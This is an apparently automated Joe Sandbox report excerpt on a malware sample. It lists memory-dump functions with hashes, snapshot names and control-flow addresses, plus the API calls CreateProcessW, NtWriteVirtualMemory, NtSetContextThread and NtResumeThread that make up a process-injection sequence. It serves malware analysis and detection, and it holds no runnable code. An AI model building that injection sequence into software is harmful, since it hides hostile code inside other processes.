                                                                                                                                                  • Instruction Fuzzy Hash: 38F1E0B0E00228CFEB25CFA9C884B9DBBF1BF49305F1491A9E419B7251DB74A985CF54
                                                                                                                                                  Function 04E3238B Relevance: 1.9, APIs: 1, Instructions: 387processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 04E391D7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: aa918d531698db07b79026f45c70bb1030d136728e126a3101936b6ded4fb362
                                                                                                                                                  • Instruction ID: d1b3622903dc8bf64e27fcc6c67f79979f26c1c5e17c399430e2eed0a7ff7993
                                                                                                                                                  • Opcode Fuzzy Hash: aa918d531698db07b79026f45c70bb1030d136728e126a3101936b6ded4fb362
                                                                                                                                                  • Instruction Fuzzy Hash: C1F1E1B0E00228CFEB25CFA9C884B9DBBF1BF49305F1491A9E419B7251DB74A985CF54
                                                                                                                                                  Function 04E3238C Relevance: 1.9, APIs: 1, Instructions: 387processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 04E391D7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: 522b411354b723be8e59b464393f70ea2663296c70b74489111b699a013b651a
                                                                                                                                                  • Instruction ID: 343807d268dc784cf621ee3cac8b07c8fa67a2a1f7173a1c42bca1cb1d9572ef
                                                                                                                                                  • Opcode Fuzzy Hash: 522b411354b723be8e59b464393f70ea2663296c70b74489111b699a013b651a
                                                                                                                                                  • Instruction Fuzzy Hash: E3F1E1B0E00228CFEB25CFA9C884B9DBBF1BF49305F1491A9E419B7251DB74A985CF54
                                                                                                                                                  Function 00E9AA57 Relevance: 1.8, Strings: 1, Instructions: 544COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: p
                                                                                                                                                  • API String ID: 0-2181537457
                                                                                                                                                  • Opcode ID: 2d562a603ee99aa82e61b9728440ef6a48f745d6f5731545fbd11cde6b171d37
                                                                                                                                                  • Instruction ID: 19cc8275978d59cb77771891ddf1b2922f77aac8610fd9e09ddd4ef934a95bc3
                                                                                                                                                  • Opcode Fuzzy Hash: 2d562a603ee99aa82e61b9728440ef6a48f745d6f5731545fbd11cde6b171d37
                                                                                                                                                  • Instruction Fuzzy Hash: 8642E274A00218CFEB50DF69C684A8EFBB2BF49315F59D1A5C448AB252CB30DD85CFA5
                                                                                                                                                  Function 00E90869 Relevance: 1.8, Strings: 1, Instructions: 508COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: p
                                                                                                                                                  • API String ID: 0-2181537457
                                                                                                                                                  • Opcode ID: e0fa2a05b032cd944f390367ebe5b9206e49637feaf7d97ae89be8147e161c4d
                                                                                                                                                  • Instruction ID: 0b7a4cfc6d9abce70d7ca2260c54c5aac1c6db9a60fa4c773051f9d6e69b16f0
                                                                                                                                                  • Opcode Fuzzy Hash: e0fa2a05b032cd944f390367ebe5b9206e49637feaf7d97ae89be8147e161c4d
                                                                                                                                                  • Instruction Fuzzy Hash: 3232C170900218CFEB50DFA9C684A8EFBB2BF48315F55D195D448AB252DB30ED85CFA5
                                                                                                                                                  Function 00E94448 Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: E
                                                                                                                                                  • API String ID: 0-4189953480
                                                                                                                                                  • Opcode ID: 0d7a4a33754186602ea54ab7c84ea3851bf16a48bc71eb2bab663e18ee4ca262
                                                                                                                                                  • Instruction ID: 160538cfa52fe6ac70ffe453f9937c67d52f0fd2571ab6db2aacb57597ae9620
                                                                                                                                                  • Opcode Fuzzy Hash: 0d7a4a33754186602ea54ab7c84ea3851bf16a48bc71eb2bab663e18ee4ca262
                                                                                                                                                  • Instruction Fuzzy Hash: 1E12D5B0A002598FEB54DF99C684A8EFBF6BF45305F15D1A5D048AB291DB30DC86CF54
                                                                                                                                                  Function 04E3A420 Relevance: 1.6, APIs: 1, Instructions: 119nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 04E3A4F8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryVirtualWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3527976591-0
                                                                                                                                                  • Opcode ID: 044c9724ac7a470a3b0f975521e22a305450f46ecf5208be14a5636cd740a797
                                                                                                                                                  • Instruction ID: fd2f73bba20e5c8197437d70619cbd2197cc651bfae7f2cca5882d7f5916db31
                                                                                                                                                  • Opcode Fuzzy Hash: 044c9724ac7a470a3b0f975521e22a305450f46ecf5208be14a5636cd740a797
                                                                                                                                                  • Instruction Fuzzy Hash: 6D41CAB4D012589FCF10CFA9D984AEEFBF1BB49310F14942AE818B7240D739AA41CB54
                                                                                                                                                  Function 04E3A428 Relevance: 1.6, APIs: 1, Instructions: 115nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 04E3A4F8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryVirtualWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3527976591-0
                                                                                                                                                  • Opcode ID: 344502749b71e31fb8d03c4936abbc291ac65a71b73844cc5342f32c0ccb79ab
                                                                                                                                                  • Instruction ID: 1b7ad6ea79e4de3a4f0b7e0712255e1a16c71d85b0df6cee2b018fce386a8e53
                                                                                                                                                  • Opcode Fuzzy Hash: 344502749b71e31fb8d03c4936abbc291ac65a71b73844cc5342f32c0ccb79ab
                                                                                                                                                  • Instruction Fuzzy Hash: 9941AAB4D012589FDF10CFA9D984AEEFBF1BB49310F14942AE814B7240D735AA45CF54
                                                                                                                                                  Function 04E39C98 Relevance: 1.6, APIs: 1, Instructions: 108nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 04E39D52
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryReadVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2834387570-0
                                                                                                                                                  • Opcode ID: 89c5ab2e4c939f12234da005338bd3ec058132f284e4a28502c368632d00d290
                                                                                                                                                  • Instruction ID: fad83f5d5d058a162cc15a4a9da166700e5506c2bd2ecf0c8b98a37562fa4945
                                                                                                                                                  • Opcode Fuzzy Hash: 89c5ab2e4c939f12234da005338bd3ec058132f284e4a28502c368632d00d290
                                                                                                                                                  • Instruction Fuzzy Hash: DA41CBB4D00258DFCF10CFAAD885ADEFBB1BB49310F10942AE815B7200D775A945CF68
                                                                                                                                                  Function 04E39CA0 Relevance: 1.6, APIs: 1, Instructions: 106nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 04E39D52
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryReadVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2834387570-0
                                                                                                                                                  • Opcode ID: e764ef8b1136a07c37565a26ba99ee7a8aaeafce56cf19f0c28ccdaf490a8320
                                                                                                                                                  • Instruction ID: 746f74f1e28cb9e9a21cd0bda079960208e48160fa57d0fefff29d25050faaae
                                                                                                                                                  • Opcode Fuzzy Hash: e764ef8b1136a07c37565a26ba99ee7a8aaeafce56cf19f0c28ccdaf490a8320
                                                                                                                                                  • Instruction Fuzzy Hash: 2941BBB4D00258DFCF10CFAAD885ADEFBB1BB09310F14942AE815B7240D775A945CF64
                                                                                                                                                  Function 04E3A579 Relevance: 1.6, APIs: 1, Instructions: 97nativethreadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtSetContextThread.NTDLL(?,?), ref: 04E3A62F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ContextThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1591575202-0
                                                                                                                                                  • Opcode ID: f11eb1a9b5569ec91e122a4768927e496f787ed1a491d51bf1515deec57a488d
                                                                                                                                                  • Instruction ID: 3461df8ed84ab1daab8ea6a428b5012d704939de1e31d6f45cccd5228de9b3f4
                                                                                                                                                  • Opcode Fuzzy Hash: f11eb1a9b5569ec91e122a4768927e496f787ed1a491d51bf1515deec57a488d
                                                                                                                                                  • Instruction Fuzzy Hash: EE41CDB4D012589FDB14CFA9D884AEEBBF1BB49310F14942AE415B7240D738AA86CF54
                                                                                                                                                  Function 04E3A580 Relevance: 1.6, APIs: 1, Instructions: 94nativethreadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtSetContextThread.NTDLL(?,?), ref: 04E3A62F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ContextThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1591575202-0
                                                                                                                                                  • Opcode ID: 917b7f757246027f938dad17003b8b405559d938943c33771686ff955468ed24
                                                                                                                                                  • Instruction ID: 2c9e72abd64127ff3de769e6bf02a00e0277bb8f405ef45e30dd8efaad7b7195
                                                                                                                                                  • Opcode Fuzzy Hash: 917b7f757246027f938dad17003b8b405559d938943c33771686ff955468ed24
                                                                                                                                                  • Instruction Fuzzy Hash: C231BBB4D012589FDB10CFAAD884AEEFBF1BF49310F14942AE414B7240D738A985CF94
                                                                                                                                                  Function 04E3A200 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtResumeThread.NTDLL(?,?), ref: 04E3A291
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                  • Opcode ID: 5b03865d9456f4d74dd609f7ae2d9504f8eb1a280c581f331b92838ad37e22bc
                                                                                                                                                  • Instruction ID: d9f9db16ef3641f742bd0a4770b9d9b2f97c7b1dd184ae7364aeb08b7819c325
                                                                                                                                                  • Opcode Fuzzy Hash: 5b03865d9456f4d74dd609f7ae2d9504f8eb1a280c581f331b92838ad37e22bc
                                                                                                                                                  • Instruction Fuzzy Hash: F431A7B4E012189FDB21CFA9D985ADEFBF1FB49310F10942AE815B7200D775A942CF94
                                                                                                                                                  Function 04E3A208 Relevance: 1.6, APIs: 1, Instructions: 80nativethreadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtResumeThread.NTDLL(?,?), ref: 04E3A291
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                  • Opcode ID: f9420b284cf59888cdd1e87d2d267505e04e67222d939c3704ba7b302d2dd697
                                                                                                                                                  • Instruction ID: ca9104dc136234b46b51f474bc0ef3d984b6e9f7c471b86daf342222f129bab2
                                                                                                                                                  • Opcode Fuzzy Hash: f9420b284cf59888cdd1e87d2d267505e04e67222d939c3704ba7b302d2dd697
                                                                                                                                                  • Instruction Fuzzy Hash: 0531B8B4D012189FDB20CFA9D984ADEFBF1BB49310F10942AE815B7300C775A942CF94
                                                                                                                                                  Function 00E9AAB0 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: p
                                                                                                                                                  • API String ID: 0-2181537457
                                                                                                                                                  • Opcode ID: 4f50020a678c76c8e6f4edd026cb2ab4e1111333bdffa6b1c14a42ace6a713e1
                                                                                                                                                  • Instruction ID: d13ffef80065abc7f3dbd07f88277d9e8c8aeec06dfc1f69e7b447a451f72eff
                                                                                                                                                  • Opcode Fuzzy Hash: 4f50020a678c76c8e6f4edd026cb2ab4e1111333bdffa6b1c14a42ace6a713e1
                                                                                                                                                  • Instruction Fuzzy Hash: A251D671E002188FEB58DF6AC841B9EBBF3BFC9300F14D0A9D449A7255DB345A858F52
                                                                                                                                                  Function 00E94458 Relevance: .6, Instructions: 560COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 97078a23cff52ee307a419bb13e7bfd2d3215dd6f502d6af00c3b816b2df1231
                                                                                                                                                  • Instruction ID: e5b0365eab61999a28091cef8f9be9ea67ecf1b216176727fc36842e837b62ed
                                                                                                                                                  • Opcode Fuzzy Hash: 97078a23cff52ee307a419bb13e7bfd2d3215dd6f502d6af00c3b816b2df1231
                                                                                                                                                  • Instruction Fuzzy Hash: E042C2B09002198FDB54DF99CA80A9EFBF6BF89305F15D1A5D048AB295DB30DD82CF94
                                                                                                                                                  Function 00E9BDD8 Relevance: .5, Instructions: 515COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5f2179bc86b321888d5dedfff6229463d208284cd06d1f2ebee23d547c6289a4
                                                                                                                                                  • Instruction ID: 1b832a60e2e6173b134092cce0aa3d086131cb9b931a09e6f95fd1c19366fe1a
                                                                                                                                                  • Opcode Fuzzy Hash: 5f2179bc86b321888d5dedfff6229463d208284cd06d1f2ebee23d547c6289a4
                                                                                                                                                  • Instruction Fuzzy Hash: C7428F78E01219CFDB24DFA9C984B9DBBB2BF49310F2191A9D809A7355D730AE85CF50
                                                                                                                                                  Function 00E91B91 Relevance: .5, Instructions: 513COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d4b6982bf67b28470f270aa96f43565843a9f9e92b1fc9accd4d2fe97e26280d
                                                                                                                                                  • Instruction ID: 4cb7831058466a2fa929b9c02cad5988fe3506b49693556e19a607300f045cc7
                                                                                                                                                  • Opcode Fuzzy Hash: d4b6982bf67b28470f270aa96f43565843a9f9e92b1fc9accd4d2fe97e26280d
                                                                                                                                                  • Instruction Fuzzy Hash: 50427E78E01219CFDB24CFA9C984B9DBBB2BF49300F1591A9D909B7395D730AA85CF50
                                                                                                                                                  Function 00E95C38 Relevance: .5, Instructions: 511COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 090161c8266cc9cff957548696b69ac1840f1ad9183c8667e65af9100579202e
                                                                                                                                                  • Instruction ID: c21c068bc0fa0c3e53ca78b8bb01b7d00e1da5f1dd9b9860cadc945791f7863e
                                                                                                                                                  • Opcode Fuzzy Hash: 090161c8266cc9cff957548696b69ac1840f1ad9183c8667e65af9100579202e
                                                                                                                                                  • Instruction Fuzzy Hash: 09427E78E01228CFDB64CFA9C984B9DBBB2FF49310F1491A9D809A7355D730AA85CF51
                                                                                                                                                  Function 00E9D89B Relevance: .5, Instructions: 486COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 1eab4a730fb69f4222a762a2d9de8839d64aec1cd303322596d9743332dbfb46
                                                                                                                                                  • Instruction ID: 2a9f7f1a79d314ec19f41d8e236e55c0894d5d726e355287d9c58655bf0826ed
                                                                                                                                                  • Opcode Fuzzy Hash: 1eab4a730fb69f4222a762a2d9de8839d64aec1cd303322596d9743332dbfb46
                                                                                                                                                  • Instruction Fuzzy Hash: 7E32B070904228CFEB50DFA9CA84A8EFBB2BF49315F55D195C448AB252DB30DD85CFA4
                                                                                                                                                  Function 00E94010 Relevance: .3, Instructions: 318COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ea8ff57dc93a95a6926d6074b9323300da59fc719b682c3276a9a0e42cd2c295
                                                                                                                                                  • Instruction ID: 4c700c63331c5a0b2d4b24d0339bda552a4ff63d6a4104777bff4d98376f7507
                                                                                                                                                  • Opcode Fuzzy Hash: ea8ff57dc93a95a6926d6074b9323300da59fc719b682c3276a9a0e42cd2c295
                                                                                                                                                  • Instruction Fuzzy Hash: 56E108B4E042198FDB14DFA9C580AAEFBB2FF89304F248169D415AB395D734AD42CF61
                                                                                                                                                  Function 00E9EEE7 Relevance: .2, Instructions: 153COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9b32b66e99e8c368985e7a46204f05024937280c64dafe2c795d7caecf5ef145
                                                                                                                                                  • Instruction ID: 7457aebc41ae709d22582b4a0d977a336a364804d61b3bc57f46e71daf3d2f05
                                                                                                                                                  • Opcode Fuzzy Hash: 9b32b66e99e8c368985e7a46204f05024937280c64dafe2c795d7caecf5ef145
                                                                                                                                                  • Instruction Fuzzy Hash: B8619374E00208DFDB58DFAAD994A9DBBF2BF89300F24946AE415BB365DB319941CF00
                                                                                                                                                  Function 00E93651 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 339d3df94803b9d40146c321c713f1475f56bf43f25fc3cfe25e62376e1c7f4f
                                                                                                                                                  • Instruction ID: db687b1cd84123e5117b74b3c25ff56a7ffce5fe3600d3cc341f4b56359c5a8d
                                                                                                                                                  • Opcode Fuzzy Hash: 339d3df94803b9d40146c321c713f1475f56bf43f25fc3cfe25e62376e1c7f4f
                                                                                                                                                  • Instruction Fuzzy Hash: 8B41DCB1E006189FEB58CF6AC84179EBBF2BFC9300F14D0AAD55CA7255EA341A858F51
                                                                                                                                                  Function 00E93D80 Relevance: 3.9, Strings: 3, Instructions: 198COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 290 e93d80-e93d82 291 e93d84 290->291 292 e93d86-e93db2 290->292 291->292 294 e93db9-e93ddd call e94010 292->294 295 e93db4 292->295 296 e93de3-e93df9 294->296 295->294 298 e93dff-e93e0b 296->298 337 e93e10 call e94448 298->337 338 e93e10 call e94458 298->338 299 e93e16-e93e2d 301 e93e37-e93e56 299->301 303 e93e5d-e93ecc 301->303 311 e93ed3-e93edb 303->311 312 e93ee1-e93ef9 311->312 314 e93efb 312->314 315 e93f00-e93f0d 312->315 314->315 316 e93f0f 315->316 317 e93f14-e93f26 315->317 316->317 318 e93f28 317->318 319 e93f2d-e93f3f 317->319 318->319 320 e93f41 319->320 321 e93f46-e93f90 319->321 320->321 325 e93f92-e93fa2 321->325 326 e93fa5-e93fad 321->326 325->326 328 e93fb4-e93fc1 326->328 329 e93fc3-e93fd5 328->329 330 e93fd7 328->330 331 e93fda-e93fdc 329->331 330->331 332 e93fde-e93fe7 331->332 333 e94003-e9400b 331->333 334 e93fe9-e93fec 332->334 335 e93ff6-e94002 332->335 334->335 337->299 338->299
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: h`$+$`
                                                                                                                                                  • API String ID: 0-4201317992
                                                                                                                                                  • Opcode ID: fbaa59f179c725b388cc046229665dcc0907b948a21f1ebfac915f1880e54396
                                                                                                                                                  • Instruction ID: d7f198c47f839509bbfe3c12d7031f2ffebed934a3c03046c1ea8f76721dad8d
                                                                                                                                                  • Opcode Fuzzy Hash: fbaa59f179c725b388cc046229665dcc0907b948a21f1ebfac915f1880e54396
                                                                                                                                                  • Instruction Fuzzy Hash: C491E4B4E002188FDB04DFA9C984A9DBBF2FF89301F159069E815AB365DB349D46CF61
                                                                                                                                                  Function 00E93D90 Relevance: 3.9, Strings: 3, Instructions: 197COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 339 e93d90-e93db2 340 e93db9-e93e0b call e94010 339->340 341 e93db4 339->341 383 e93e10 call e94448 340->383 384 e93e10 call e94458 340->384 341->340 345 e93e16-e93ef9 360 e93efb 345->360 361 e93f00-e93f0d 345->361 360->361 362 e93f0f 361->362 363 e93f14-e93f26 361->363 362->363 364 e93f28 363->364 365 e93f2d-e93f3f 363->365 364->365 366 e93f41 365->366 367 e93f46-e93f90 365->367 366->367 371 e93f92-e93fa2 367->371 372 e93fa5-e93fad 367->372 371->372 374 e93fb4-e93fc1 372->374 375 e93fc3-e93fd5 374->375 376 e93fd7 374->376 377 e93fda-e93fdc 375->377 376->377 378 e93fde-e93fe7 377->378 379 e94003-e9400b 377->379 380 e93fe9-e93fec 378->380 381 e93ff6-e94002 378->381 380->381 383->345 384->345
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
